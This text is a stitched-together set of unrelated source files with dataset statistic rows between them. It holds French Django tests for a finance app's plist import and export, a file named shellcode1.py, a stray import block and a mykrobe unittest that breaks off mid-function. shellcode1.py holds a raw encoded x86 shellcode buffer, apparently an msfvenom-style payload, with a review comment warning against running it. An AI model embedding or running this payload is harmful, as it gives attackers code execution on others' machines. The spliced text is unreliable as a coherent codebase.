            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args,
                     ("compte non supprimable (7) 'hjhjhkh' car il a des opérations ou des écheances rattachées", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_16"))
    def test_element_import16(self):
        """Successful deletion of an account."""
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request, "compte (7) 'hjhjhkh' supprimé")
class Test_import_item_modif_effectives_cote_ope(Test_import_abstract):
    """Plist-import tests for effective changes on the operation (Ope) side.

    setUp builds two categories, two accounts, credit/debit payment means,
    two payees and one reference operation (pk 66) that the fixture plists
    create/modify/delete.
    """

    def setUp(self):
        self.request = self.request_get('outils')
        self.lastmaj = datetime.datetime(2014, 6, 15, 00, 25, 14, tzinfo=tz.utc)
        self.cat = models.Cat.objects.create(pk=1, nom="Cat aded", type="d", couleur=0)
        self.cat2 = models.Cat.objects.create(pk=2, nom="Cat aded2", type="d", couleur=0)
        self.cpt = models.Compte.objects.create(pk=1, nom='Ghh', couleur=0)
        self.cpt2 = models.Compte.objects.create(pk=2, nom='Ghh2', couleur=0)
        self.moyen_credit = models.Moyen.objects.create(id=settings.MD_CREDIT, nom="rr", type="r")
        self.moyen_debit = models.Moyen.objects.create(id=settings.MD_DEBIT, nom="dd", type="d")
        self.tiers = models.Tiers.objects.get_or_create(nom="Ope standart", defaults={'nom': "Ope standart"})[0]
        self.tiers2 = models.Tiers.objects.get_or_create(nom="tiers2", defaults={'nom': "tiers2"})[0]
        # Reference operation the fixtures act upon.
        self.ope = models.Ope.objects.create(pk=66, compte=self.cpt2, date=datetime.date(2013, 6, 15), montant=25, tiers=self.tiers2,
                                             cat=self.cat2, moyen=self.moyen_credit)

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_17"))
    def test_element_import17(self):
        """The account referenced by an imported operation does not exist."""
        self.ope.delete()
        self.cpt.delete()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "attention le compte (1) n'existe pas alors qu'on le demande pour l'opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_18"))
    def test_element_import18(self):
        """The category referenced by an imported operation does not exist."""
        self.ope.delete()
        self.cat.delete()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "attention la catégorie (1) n'existe pas alors qu'on le demande pour l'opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_19"))
    def test_element_import19(self):
        """Creating an operation that already exists must raise."""
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "attention l'opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 existe déja alors qu'on demande de la créer", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_20"))
    def test_element_import20(self):
        """Operation created without problem; the payee is created on the fly."""
        self.ope.delete()
        self.tiers.delete()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request, "tiers 'Ope standart' créé")
        self.assertEqual(str(models.Ope.objects.get(id=66)),
                         "(66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: Ghh")

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_21"))
    def test_element_import21(self):
        """Operation created; missing cat/compte are created by the import."""
        self.ope.delete()
        self.cat.delete()
        self.cpt.delete()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertEqual(str(models.Ope.objects.get(id=66)),
                         "(66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: hjhjhkh")

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_22"))
    def test_element_import22(self):
        """Modifying an operation that does not exist must raise."""
        self.ope.delete()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "attention cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 n'existe pas alors qu'on demande de la modifier", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
    def test_element_import23(self):
        """A mother operation (has a split child) cannot be modified."""
        fille = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25, tiers=self.tiers,
                                          cat=self.cat, moyen=self.moyen_debit)
        fille.mere = self.ope
        fille.save()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request,
                                   "impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est mère")

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
    def test_element_import24(self):
        """A daughter operation (part of a split) cannot be modified."""
        mere = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25, tiers=self.tiers,
                                         cat=self.cat, moyen=self.moyen_debit)
        self.ope.mere = mere
        self.ope.save()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request,
                                   "impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est fille", )

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
    def test_element_import25(self):
        """A reconciled operation cannot be modified."""
        rapp = models.Rapp.objects.create(nom="test_rapp")
        self.ope.rapp = rapp
        self.ope.save()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request,
                                   "impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est rapprochée", )

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
    def test_element_import26(self):
        """An operation on a closed account cannot be modified."""
        self.cpt2.ouvert = False
        self.cpt2.save()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request,
                                   "impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car son compte est fermé", )

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
    # NOTE(review): missing underscore ("testelement_" vs "test_element_");
    # still discovered by unittest (starts with "test") but inconsistent
    # with the sibling methods — worth renaming in a dedicated change.
    def testelement_import27(self):
        """A twinned operation (transfer leg) cannot be modified."""
        jumelle = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=10.25,
                                            tiers=self.tiers, cat=self.cat, moyen=self.moyen_credit)
        self.ope.jumelle = jumelle
        self.ope.save()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request,
                                   "impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est jumellée", )

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
    def test_element_import28(self):
        """A pointed (checked) operation cannot be modified."""
        self.ope.pointe = True
        self.ope.save()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request,
                                   "impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est pointée", )

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import31(self):
        """Deleting an operation that does not exist must raise."""
        self.ope.delete()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args,
                     ("attention cette opération 66 n'existe pas alors qu'on demande de la supprimer", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import32(self):
        """Deleting a mother operation must raise."""
        fille = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25, tiers=self.tiers,
                                          cat=self.cat, moyen=self.moyen_debit)
        fille.mere = self.ope
        fille.save()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est mère", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import33(self):
        """Deleting a daughter operation must raise."""
        mere = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25, tiers=self.tiers,
                                         cat=self.cat, moyen=self.moyen_debit)
        self.ope.mere = mere
        self.ope.save()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est fille", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import34(self):
        """Deleting a reconciled operation must raise."""
        rapp = models.Rapp.objects.create(nom="test_rapp")
        self.ope.rapp = rapp
        self.ope.save()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est rapprochée", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import35(self):
        """Deleting an operation on a closed account must raise."""
        self.cpt2.ouvert = False
        self.cpt2.save()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car son compte est fermé", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import36(self):
        """Deleting a twinned operation must raise."""
        jumelle = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=10.25,
                                            tiers=self.tiers, cat=self.cat, moyen=self.moyen_credit)
        self.ope.jumelle = jumelle
        self.ope.save()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est jumellée", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import37(self):
        """Deleting a pointed (checked) operation must raise."""
        self.ope.pointe = True
        self.ope.save()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est pointée", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import38(self):
        """Deletion proceeds when the stored operation matches the plist."""
        self.ope.delete()
        # Recreate pk 66 with the exact values the plist expects to delete.
        self.ope = models.Ope.objects.create(pk=66, compte=self.cpt, date=datetime.date(2014, 6, 16), montant=-10.25,
                                             tiers=self.tiers, cat=self.cat, moyen=self.moyen_debit)
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request,
                                   "opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 supprimée")

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
    def test_element_import39(self):
        """Deletion refused when the stored operation differs (wrong date)."""
        self.ope.delete()
        # Same pk but the date differs from the plist, so deletion must fail.
        self.ope = models.Ope.objects.create(pk=66, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25,
                                             tiers=self.tiers, cat=self.cat, moyen=self.moyen_debit)
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "attention cette opération 66 existe alors qu'on demande de la supprimer mais elle est différente :\nDATE:\t2014-06-15!= 2014-06-16",))
@override_settings(CODE_DEVICE_POCKET_MONEY='totototo')
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "export_plist"))
class Test_import_money_journal_export(Test_import_abstract):
    """End-to-end test of the Money Journal plist export.

    setUp wipes any leftover export files; test_global seeds Db_log rows,
    runs the exporter with a mocked clock, and compares every produced log
    file against the expected fixtures.
    """
    fixtures = ['test_money_journal.yaml', ]

    def setUp(self):
        self.request = self.request_get('outils')
        self.exp = Export_icompta_plist(request=self.request)
        directory = os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "export_plist", 'Applications',
                                 'Money Journal', 'log')
        # Remove files first, then (now empty) directories, bottom-up.
        efface = list()
        for root, dirs, files in os.walk(directory, topdown=False):
            for name in files:
                efface.append(os.path.join(root, name))
                os.remove(os.path.join(root, name))
        for root, dirs, files in os.walk(directory, topdown=False):
            for name in dirs:
                efface.append(os.path.join(root, name))
                os.rmdir(os.path.join(root, name))

    def comp_file(self, filename, nom):
        """Compare one produced log file against its expected fixture.

        filename: basename of the log file under .../log/140/3/4/.
        nom: label passed through to assert2filesequal for the report.
        """
        attendu = os.path.join("export_plist_attendu", 'Applications', 'Money Journal', 'log', '140', '3', '4', filename)
        recu = os.path.join("export_plist", 'Applications', 'Money Journal', 'log', '140', '3', '4', filename)
        self.assert2filesequal(recu, attendu, nom=nom)

    def test_global(self):
        # Start from an empty Db_log table.
        models.Db_log.objects.all().delete()
        # Category modified.
        models.Db_log.objects.create(datamodel="cat", id_model=1, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07901")
        # Categories created.
        models.Db_log.objects.create(datamodel="cat", id_model=2, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07902")
        models.Db_log.objects.create(datamodel="cat", id_model=72, type_action="I", uuid="51a0004d-7f28-427b-8cf7-44ad2ac07972")
        # A modification of an item that was since deleted (so it will not
        # be exported as an update).
        models.Db_log.objects.create(datamodel="cat", id_model=35, type_action="I", uuid="51a0004d-7f28-427b-8cf7-44ad2ac07972")
        models.Cat.objects.filter(id=4).delete()  # category 4 was deleted
        models.Db_log.objects.create(datamodel="cat", id_model=4, type_action="D", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a01")
        # Account changes: one update, one insert.
        models.Compte.objects.filter(id=1).update(nom="compte_modifie")
        models.Compte.objects.create(id=3, nom="Compte nouveau")
        models.Db_log.objects.create(datamodel="compte", id_model=1, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a01")
        models.Db_log.objects.create(datamodel="compte", id_model=3, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a01")
        # Operation log rows (the operations themselves come from the fixture).
        models.Db_log.objects.create(datamodel="ope", id_model=1, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a01")
        models.Db_log.objects.create(datamodel="ope", id_model=2, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a02")
        models.Db_log.objects.create(datamodel="ope", id_model=3, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a03")
        models.Db_log.objects.create(datamodel="ope", id_model=8, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a08")
        models.Db_log.objects.create(datamodel="ope", id_model=9, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a09")
        models.Db_log.objects.create(datamodel="ope", id_model=11, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a10")
        models.Db_log.objects.create(datamodel="ope", id_model=12, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a11")
        models.Db_log.objects.create(datamodel="ope", id_model=13, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a12")
        models.Db_log.objects.create(datamodel="ope", id_model=14, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a13")
        models.Db_log.objects.create(datamodel="ope", id_model=15, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a14")
        models.Db_log.objects.create(datamodel="ope", id_model=16, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a15")
        models.Db_log.objects.create(datamodel="ope", id_model=17, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a16")
        models.Db_log.objects.create(datamodel="ope", id_model=18, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a17")
        models.Db_log.objects.create(datamodel="ope", id_model=19, type_action="D", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a18")
        # Pin every log row to one timestamp so the export selection window
        # and the generated file names are deterministic.
        date_time_action = datetime.datetime(2014, 6, 23, 18, 51, 40, tzinfo=tz.utc)
        models.Db_log.objects.all().update(date_time_action=date_time_action)
        mock_date = self.add_minutes(tz.make_aware(datetime.datetime(2014, 6, 23, 0, 0, 0), timezone=tz.utc))
        # Run the export under a mocked clock.
        with mock.patch('gsb.utils.timezone.now', mock_date.now):
            nb = self.exp.all_since_date(datetime.datetime(2014, 1, 21, 19, 27, 14, tzinfo=tz.utc))
        # Check the per-model export counts.
        compare(nb, collections.Counter({'global': 20, 'ope': 14, 'cat': 4, 'compte': 2}))
        # Compare the list of produced file names against the fixture tree.
        attendu = os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "export_plist_attendu", 'Applications',
                               'Money Journal')
        recu = os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "export_plist", 'Applications',
                            'Money Journal')
        list_fic_recu = list()
        list_fic_attendu = list()
        for root, dirs, files in os.walk(recu, topdown=False):
            for name in files:
                list_fic_recu.append(os.path.basename(os.path.join(root, name)))
        for root, dirs, files in os.walk(attendu, topdown=False):
            for name in files:
                list_fic_attendu.append(os.path.basename(os.path.join(root, name)))
        compare(list_fic_recu, list_fic_attendu)
        # Compare the content of each produced file, one minute apart each.
        self.comp_file('1403481660000.log', "export_plist_cat_modif")
        self.comp_file('1403481720000.log', "export_plist_cat_crea")
        self.comp_file('1403481780000.log', "export_plist_cat_vir_eff")
        self.comp_file('1403481840000.log', "export_plist_cat_vir")
        self.comp_file('1403481900000.log', "export_plist_compte_update")
        self.comp_file('1403481960000.log', "export_plist_compte_insert")
        self.comp_file('1403482020000.log', "export_plist_ope1_modifie_negatif")
        self.comp_file('1403482080000.log', "export_plist_ope2_modifie_positif")
        self.comp_file('1403482140000.log', "export_plist_ope3_ost")
        self.comp_file('1403482200000.log', "export_plist_ope8_virement_sortie")
        self.comp_file('1403482260000.log', "export_plist_ope9_virement_entree")
        self.comp_file('1403482320000.log', "export_plist_ope11_ope_ventile_mere")
        self.comp_file('1403482380000.log', "export_plist_ope12_ope_fille_1")
        self.comp_file('1403482440000.log', "export_plist_ope13_ope_fille_2")
        self.comp_file('1403482500000.log', "export_plist_ope14_vir_cree_sortie")
        self.comp_file('1403482560000.log', "export_plist_ope15_vir_cree_entree")
        self.comp_file('1403482620000.log', "export_plist_ope16_ope_mere_cree")
        self.comp_file('1403482680000.log', "export_plist_ope17_ope_fille_cree_1")
        self.comp_file('1403482740000.log', "export_plist_ope18_ope_fille_cree_2")
        self.comp_file('1403482800000.log', "export_plist_ope19_efface")
| 61.237069
| 224
| 0.664954
| 5,725
| 42,621
| 4.785328
| 0.078777
| 0.058622
| 0.054095
| 0.034166
| 0.819718
| 0.805337
| 0.792086
| 0.771865
| 0.739086
| 0.697511
| 0
| 0.061082
| 0.203726
| 42,621
| 695
| 225
| 61.32518
| 0.746155
| 0.035335
| 0
| 0.545139
| 0
| 0.048611
| 0.197477
| 0.033858
| 0
| 0
| 0
| 0.001439
| 0.069444
| 1
| 0.085069
| false
| 0
| 0.25
| 0
| 0.348958
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4f35e4a20d916693386c8ffce742c7492271f19
| 1,684
|
py
|
Python
|
utils/shellcode1.py
|
sivak1rl/bin-scripts
|
e015ce5ee589a9beb8be63bc18728452ef634d61
|
[
"MIT"
] | null | null | null |
utils/shellcode1.py
|
sivak1rl/bin-scripts
|
e015ce5ee589a9beb8be63bc18728452ef634d61
|
[
"MIT"
] | null | null | null |
utils/shellcode1.py
|
sivak1rl/bin-scripts
|
e015ce5ee589a9beb8be63bc18728452ef634d61
|
[
"MIT"
] | null | null | null |
# SECURITY NOTE(review): this is a raw binary shellcode payload (likely
# generated by a tool such as msfvenom — TODO confirm provenance). It is
# opaque machine code, not Python logic: do not execute it outside an
# isolated analysis environment, and do not "clean it up" — any byte
# change breaks or alters the payload.
buf = ""
buf += "\xdb\xdd\xd9\x74\x24\xf4\x58\xbf\x63\x6e\x69\x90\x33"
buf += "\xc9\xb1\x52\x83\xe8\xfc\x31\x78\x13\x03\x1b\x7d\x8b"
buf += "\x65\x27\x69\xc9\x86\xd7\x6a\xae\x0f\x32\x5b\xee\x74"
buf += "\x37\xcc\xde\xff\x15\xe1\x95\x52\x8d\x72\xdb\x7a\xa2"
buf += "\x33\x56\x5d\x8d\xc4\xcb\x9d\x8c\x46\x16\xf2\x6e\x76"
buf += "\xd9\x07\x6f\xbf\x04\xe5\x3d\x68\x42\x58\xd1\x1d\x1e"
buf += "\x61\x5a\x6d\x8e\xe1\xbf\x26\xb1\xc0\x6e\x3c\xe8\xc2"
buf += "\x91\x91\x80\x4a\x89\xf6\xad\x05\x22\xcc\x5a\x94\xe2"
buf += "\x1c\xa2\x3b\xcb\x90\x51\x45\x0c\x16\x8a\x30\x64\x64"
buf += "\x37\x43\xb3\x16\xe3\xc6\x27\xb0\x60\x70\x83\x40\xa4"
buf += "\xe7\x40\x4e\x01\x63\x0e\x53\x94\xa0\x25\x6f\x1d\x47"
buf += "\xe9\xf9\x65\x6c\x2d\xa1\x3e\x0d\x74\x0f\x90\x32\x66"
buf += "\xf0\x4d\x97\xed\x1d\x99\xaa\xac\x49\x6e\x87\x4e\x8a"
buf += "\xf8\x90\x3d\xb8\xa7\x0a\xa9\xf0\x20\x95\x2e\xf6\x1a"
buf += "\x61\xa0\x09\xa5\x92\xe9\xcd\xf1\xc2\x81\xe4\x79\x89"
buf += "\x51\x08\xac\x1e\x01\xa6\x1f\xdf\xf1\x06\xf0\xb7\x1b"
buf += "\x89\x2f\xa7\x24\x43\x58\x42\xdf\x04\xa7\x3b\xde\xac"
buf += "\x4f\x3e\xe0\x57\xa9\xb7\x06\x0d\xd9\x91\x91\xba\x40"
buf += "\xb8\x69\x5a\x8c\x16\x14\x5c\x06\x95\xe9\x13\xef\xd0"
buf += "\xf9\xc4\x1f\xaf\xa3\x43\x1f\x05\xcb\x08\xb2\xc2\x0b"
buf += "\x46\xaf\x5c\x5c\x0f\x01\x95\x08\xbd\x38\x0f\x2e\x3c"
buf += "\xdc\x68\xea\x9b\x1d\x76\xf3\x6e\x19\x5c\xe3\xb6\xa2"
buf += "\xd8\x57\x67\xf5\xb6\x01\xc1\xaf\x78\xfb\x9b\x1c\xd3"
buf += "\x6b\x5d\x6f\xe4\xed\x62\xba\x92\x11\xd2\x13\xe3\x2e"
buf += "\xdb\xf3\xe3\x57\x01\x64\x0b\x82\x81\x84\xee\x06\xfc"
buf += "\x2c\xb7\xc3\xbd\x30\x48\x3e\x81\x4c\xcb\xca\x7a\xab"
buf += "\xd3\xbf\x7f\xf7\x53\x2c\xf2\x68\x36\x52\xa1\x89\x13"
| 58.068966
| 61
| 0.675178
| 379
| 1,684
| 3
| 0.506596
| 0.010554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.278299
| 0.050475
| 1,684
| 28
| 62
| 60.142857
| 0.43277
| 0
| 0
| 0
| 0
| 0.964286
| 0.833729
| 0.833729
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4fc4ef35df875b9db5179eb056f16dece60bdc1
| 195
|
py
|
Python
|
ttest.py
|
AaPaul/segnet1
|
2e8196a15c2b9ac2b2d5f712c10c4278e8df5dec
|
[
"MIT"
] | null | null | null |
ttest.py
|
AaPaul/segnet1
|
2e8196a15c2b9ac2b2d5f712c10c4278e8df5dec
|
[
"MIT"
] | null | null | null |
ttest.py
|
AaPaul/segnet1
|
2e8196a15c2b9ac2b2d5f712c10c4278e8df5dec
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
import os, sys
import numpy as np
import math
import skimage
import skimage.io
| 19.5
| 46
| 0.835897
| 30
| 195
| 5.433333
| 0.533333
| 0.171779
| 0.245399
| 0.355828
| 0.429448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 195
| 9
| 47
| 21.666667
| 0.964497
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f2013b6d3afe7e6fca516e3757efcc921839062f
| 4,716
|
py
|
Python
|
python/clockwork/tests/mykrobe_test.py
|
oxfordmmm/clockwork
|
be1f6ea49debf8cb2b8f1ba974df2dc567d150fd
|
[
"MIT"
] | 1
|
2020-01-10T06:43:39.000Z
|
2020-01-10T06:43:39.000Z
|
python/clockwork/tests/mykrobe_test.py
|
oxfordmmm/clockwork
|
be1f6ea49debf8cb2b8f1ba974df2dc567d150fd
|
[
"MIT"
] | null | null | null |
python/clockwork/tests/mykrobe_test.py
|
oxfordmmm/clockwork
|
be1f6ea49debf8cb2b8f1ba974df2dc567d150fd
|
[
"MIT"
] | null | null | null |
import unittest
import os
import shutil
from clockwork import mykrobe, utils
# Directory that contains the installed mykrobe module; the test data is
# shipped relative to it.
modules_dir = os.path.dirname(os.path.abspath(mykrobe.__file__))
# Fixture files for these tests live under <modules_dir>/tests/data/mykrobe.
data_dir = os.path.join(modules_dir, 'tests', 'data', 'mykrobe')
class TestMykrobe(unittest.TestCase):
def test_run_predict_and_check_susceptibility(self):
    '''test run_predict and susceptibility_dict_from_json_file'''
    # Run the predictor on the bundled reads, then parse its JSON output.
    outdir = 'tmp.mykrobe_run_predict'
    reads = os.path.join(data_dir, 'run_predict.reads.fq.gz')
    mykrobe.run_predict([reads], outdir, 'sample_name', 'tb')
    results = mykrobe.susceptibility_dict_from_json_file(os.path.join(outdir, 'out.json'))
    # Isoniazid is the only resistant call; everything else is susceptible.
    for drug, info in results.items():
        expected = 'R' if drug == 'Isoniazid' else 'S'
        self.assertEqual(expected, info['predict'])
    shutil.rmtree(outdir)
def test_run_predict_and_check_susceptibility_custom_panel(self):
'''test run_predict and susceptibility_dict_from_json_file with custom panel'''
# rerun the prvious test, but with custom probe and js on file. These just have the
# embB_D328Y muatation. Should be susceptible
reads_file = os.path.join(data_dir, 'run_predict.reads.fq.gz')
tmp_out = 'tmp.mykrobe_run_predict'
custom_probe = os.path.join(data_dir, 'run_predict.probes.fa')
custom_json = os.path.join(data_dir, 'run_predict.json')
mykrobe.run_predict([reads_file, reads_file], tmp_out, 'sample_name', 'tb', custom_probe_and_json=(custom_probe, custom_json))
json_file = os.path.join(tmp_out, 'out.json')
suscept_data = mykrobe.susceptibility_dict_from_json_file(json_file)
for drug in suscept_data:
if drug == 'Ethambutol':
